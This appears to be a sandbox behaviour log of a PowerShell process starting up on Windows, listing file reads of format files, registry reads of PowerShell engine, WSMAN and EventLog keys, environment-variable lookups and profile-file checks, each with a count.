| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 2762 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 310, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 281 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
4 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
